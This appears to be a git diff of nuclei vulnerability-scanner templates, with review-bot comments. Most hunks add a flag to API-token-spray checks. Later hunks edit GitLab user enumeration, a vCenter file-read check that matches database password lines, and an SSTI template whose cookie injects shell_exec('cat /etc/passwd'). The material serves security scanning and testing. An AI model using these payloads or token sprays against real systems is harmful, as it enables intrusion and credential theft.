a885c5c780..dbf3c9ab35 100644 --- a/token-spray/jumpcloud.yaml +++ b/token-spray/jumpcloud.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,jumpcloud +self-contained: true requests: - method: GET path: diff --git a/token-spray/lokalise.yaml b/token-spray/lokalise.yaml index 0c937b51fa..5003f25b31 100644 --- a/token-spray/lokalise.yaml +++ b/token-spray/lokalise.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,lokalise +self-contained: true requests: - method: GET path: diff --git a/token-spray/loqate.yaml b/token-spray/loqate.yaml index d0ed434602..dcbf5b156d 100644 --- a/token-spray/loqate.yaml +++ b/token-spray/loqate.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,loqate +self-contained: true requests: - method: GET path: 
diff --git a/token-spray/mailchimp.yaml b/token-spray/mailchimp.yaml index 9d7073e46c..d25870e279 100644 --- a/token-spray/mailchimp.yaml +++ b/token-spray/mailchimp.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mailchimp +self-contained: true network: - inputs: - data: "AUTH PLAIN {{base64(hex_decode('00')+'apikey'+hex_decode('00')+token)}}\r\n" diff --git a/token-spray/mailgun.yaml b/token-spray/mailgun.yaml index 3667ba1c69..c4997aaaa4 100644 --- a/token-spray/mailgun.yaml +++ b/token-spray/mailgun.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mailgun +self-contained: true requests: - method: GET path: diff --git a/token-spray/mapbox.yaml b/token-spray/mapbox.yaml index c4640d9695..1e246f783b 100644 --- a/token-spray/mapbox.yaml +++ b/token-spray/mapbox.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,mapbox +self-contained: true requests: - method: GET path: diff --git a/token-spray/nerdgraph.yaml b/token-spray/nerdgraph.yaml index d67d458faa..ca570964e4 100644 --- a/token-spray/nerdgraph.yaml +++ b/token-spray/nerdgraph.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,newrelic,nerdgraph +self-contained: true requests: - method: POST path: diff --git a/token-spray/npm.yaml b/token-spray/npm.yaml index cfe2c86746..fb0ef0b6b7 100644 --- a/token-spray/npm.yaml +++ b/token-spray/npm.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,node,npm,package,manager +self-contained: true requests: - method: GET path: diff --git a/token-spray/openweather.yaml b/token-spray/openweather.yaml index 1a9a5058e3..916936aa97 100644 --- a/token-spray/openweather.yaml +++ b/token-spray/openweather.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,weather,openweather +self-contained: true requests: - method: GET path: diff --git a/token-spray/pagerduty.yaml b/token-spray/pagerduty.yaml index fcc00d7e88..bad59948ed 100644 --- a/token-spray/pagerduty.yaml +++ b/token-spray/pagerduty.yaml 
@@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pagerduty +self-contained: true requests: - method: GET path: diff --git a/token-spray/pendo.yaml b/token-spray/pendo.yaml index 8ea141bcc0..66cd885dc6 100644 --- a/token-spray/pendo.yaml +++ b/token-spray/pendo.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pendo +self-contained: true requests: - method: GET path: diff --git a/token-spray/pivotaltracker.yaml b/token-spray/pivotaltracker.yaml index c52e04af9a..d7a74ded66 100644 --- a/token-spray/pivotaltracker.yaml +++ b/token-spray/pivotaltracker.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,pivotaltracker +self-contained: true requests: - method: GET path: diff --git a/token-spray/postmark.yaml b/token-spray/postmark.yaml index 5b5aead0dc..85367b5c61 100644 --- a/token-spray/postmark.yaml +++ b/token-spray/postmark.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,postmark +self-contained: true requests: - method: GET path: diff --git a/token-spray/sendgrid.yaml b/token-spray/sendgrid.yaml index b887b0b7d1..d9330371f1 100644 --- a/token-spray/sendgrid.yaml +++ b/token-spray/sendgrid.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,sendgrid +self-contained: true network: - inputs: - data: "ehlo\r\n" diff --git a/token-spray/slack.yaml b/token-spray/slack.yaml index 2703830f3a..8203aa56b5 100644 --- a/token-spray/slack.yaml +++ b/token-spray/slack.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,slack +self-contained: true requests: - method: POST path: diff --git a/token-spray/sonarcloud.yaml b/token-spray/sonarcloud.yaml index fdf0dc6724..aed9d1760f 100644 --- a/token-spray/sonarcloud.yaml +++ b/token-spray/sonarcloud.yaml @@ -7,6 +7,7 @@ info: severity: info tags: token-spray,sonarcloud +self-contained: true requests: - method: GET path: diff --git a/token-spray/spotify.yaml b/token-spray/spotify.yaml index 2ccc098209..01f1d80084 100644 --- a/token-spray/spotify.yaml +++ b/token-spray/spotify.yaml 
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,spotify
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/square.yaml b/token-spray/square.yaml
index 383e3ddc8a..7ccb835189 100644
--- a/token-spray/square.yaml
+++ b/token-spray/square.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,square
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/stripe.yaml b/token-spray/stripe.yaml
index 16e358e75a..50e8979aa7 100644
--- a/token-spray/stripe.yaml
+++ b/token-spray/stripe.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,stripe
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/tinypng.yaml b/token-spray/tinypng.yaml
index 922e62848b..357fb1bdbf 100644
--- a/token-spray/tinypng.yaml
+++ b/token-spray/tinypng.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,tinypng
+self-contained: true
 requests:
 - method: POST
 path:
diff --git a/token-spray/travisci.yaml b/token-spray/travisci.yaml
index 5212516fc1..3b43f9e529 100644
--- a/token-spray/travisci.yaml
+++ b/token-spray/travisci.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,travis
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/twitter.yaml b/token-spray/twitter.yaml
index d648daa0d1..ec654b2782 100644
--- a/token-spray/twitter.yaml
+++ b/token-spray/twitter.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,twitter
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/visualstudio.yaml b/token-spray/visualstudio.yaml
index a05d17e57a..e7c0a0a2f8 100644
--- a/token-spray/visualstudio.yaml
+++ b/token-spray/visualstudio.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,visualstudio,microsoft
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/wakatime.yaml b/token-spray/wakatime.yaml
index b48ed5e79f..7237446fce 100644
--- a/token-spray/wakatime.yaml
+++ b/token-spray/wakatime.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,wakatime
+self-contained: true
 requests:
 - method: GET
 path:
diff --git a/token-spray/weglot.yaml b/token-spray/weglot.yaml
index 9c1a8e2874..37e6b647ef 100644
--- a/token-spray/weglot.yaml
+++ b/token-spray/weglot.yaml
@@ -7,6 +7,7 @@ info:
 severity: info
 tags: token-spray,weglot
+self-contained: true
 requests:
 - method: POST
 path:
diff --git a/token-spray/youtube.yaml b/token-spray/youtube.yaml
index 3ab7726092..8c1384579b 100644
--- a/token-spray/youtube.yaml
+++ b/token-spray/youtube.yaml
@@ -7,17 +7,19 @@ info:
 severity: info
 tags: token-spray,youtube
+self-contained: true
 requests:
 - method: GET
 path:
 - "https://www.googleapis.com/youtube/v3/activities?part=contentDetails&maxResults=25&channelId=UC-lHJZR3Gqxm24_Vd_AJ5Yw&key={{token}}"
- matchers-condition: or
+ matchers-condition: or
 matchers:
 - type: word
 part: body
 words:
 - 'quotaExceeded'
+
 - type: status
 status:
 - 200
diff --git a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
index 70867414e7..869b0ddd14 100644
--- a/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-enumeration.yaml
@@ -16,10 +16,9 @@ requests:
 Accept: application/json, text/plain, */*
 Referer: {{BaseURL}}
+ threads: 50
 payloads:
 user: helpers/wordlists/user-list.txt
- attack: sniper
- threads: 50
 matchers-condition: and
 matchers:
diff --git a/vulnerabilities/gitlab/gitlab-user-open-api.yaml b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
index e6b7567303..8302f25e2a 100644
--- a/vulnerabilities/gitlab/gitlab-user-open-api.yaml
+++ b/vulnerabilities/gitlab/gitlab-user-open-api.yaml
@@ -15,10 +15,9 @@ requests:
 Accept: application/json, text/plain, */*
 Referer: {{BaseURL}}
+ threads: 50
 payloads:
 uid: helpers/wordlists/numbers.txt
- attack: sniper
- threads: 50
 matchers-condition: and
 matchers:
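Review bot: `threads: 50` is moved up to the request level while `attack: sniper` is dropped, so the request now relies on sniper being nuclei's default attack mode for a single payload set; a short comment such as `# attack defaults to sniper; threads caps concurrent wordlist requests` would spare the next reader a trip to the docs. The same pair of changes is in the gitlab-user-open-api hunk. Fifty concurrent requests against an account-related GitLab endpoint is also likely to trip per-IP rate limiting on hardened instances, and a 429 would then fall through to the matchers, which lie outside the hunk; that is worth either a note or a lower default.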
diff --git a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
index 889fd93cff..f1d82689fa 100644
--- a/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
+++ b/vulnerabilities/other/pdf-signer-ssti-to-rce.yaml
@@ -12,6 +12,8 @@ requests:
 - "{{BaseURL}}"
 headers:
 Cookie: "CSRF-TOKEN=rnqvt{{shell_exec('cat /etc/passwd')}}to5gw; simcify=uv82sg0jj2oqa0kkr2virls4dl"
+
+ skip-variables-check: true
 matchers-condition: and
 matchers:
 - type: status
diff --git a/vulnerabilities/other/rconfig-rce.yaml b/vulnerabilities/other/rconfig-rce.yaml
index c08699eb6d..00bc474218 100644
--- a/vulnerabilities/other/rconfig-rce.yaml
+++ b/vulnerabilities/other/rconfig-rce.yaml
@@ -33,7 +33,7 @@ requests:
 --01b28e152ee044338224bf647275f8eb
 Content-Disposition: form-data; name="email"
- test@{{randstr.tld}}
+ test@{{randstr}}.tld
 --01b28e152ee044338224bf647275f8eb
 Content-Disposition: form-data; name="editid"
diff --git a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
index 2fc7c98a9e..9ee7ce40bb 100644
--- a/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
+++ b/vulnerabilities/vmware/vmware-vcenter-lfi.yaml
@@ -12,7 +12,7 @@ info:
 requests:
 - raw:
 - |
- GET /eam/vib?id=§path§\vcdb.properties HTTP/1.1
+ GET /eam/vib?id={{path}}\vcdb.properties HTTP/1.1
 Host: {{Hostname}}
 payloads:
@@ -20,14 +20,13 @@ requests:
 - "C:\\ProgramData\\VMware\\VMware+VirtualCenter" # vCenter Server 5.5 and earlier (Windows 2008)
 - "C:\\Documents+and+Settings\\All+Users\\Application+Data\\VMware\\VMware+VirtualCenter" # Other Windows versions
 - "C:\\ProgramData\\VMware\\vCenterServer\\cfg\\vmware-vpx" # vCenter Server => 6.0
- attack: sniper
 matchers-condition: and
 matchers:
 - type: regex
 regex:
 - "(?m)^(driver|dbtype|password(\\.encrypted)?)\\s="
- part: body
+
 - type: status
 status:
 - 200
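Review bot: `skip-variables-check: true` is added without saying why it is needed, and the reason is only visible two context lines up, where the Cookie value carries a literal `{{shell_exec(...)}}` probe that nuclei's unresolved-variable check would otherwise treat as a missing template variable. Suggest `# the cookie holds a literal {{...}} SSTI probe, not a template variable` directly above the new key so it is not removed later as an unused option. The matchers continue past the hunk, so I can't tell whether the status check alone is what confirms the result.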
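Review bot: `part: body` is removed from the regex matcher in the second vmware-vcenter-lfi hunk, so the regex now relies on nuclei's default matcher part; if I recall correctly that default is the response body, but a comment `# part defaults to body` on the matcher would make the intent explicit rather than implicit. The same hunk drops `attack: sniper`, again leaning on the default for a single payload list, which deserves the same one-line note. Unrelated to the change itself but in the hunk's context, the comment `# vCenter Server => 6.0` reads as if `>=` were meant.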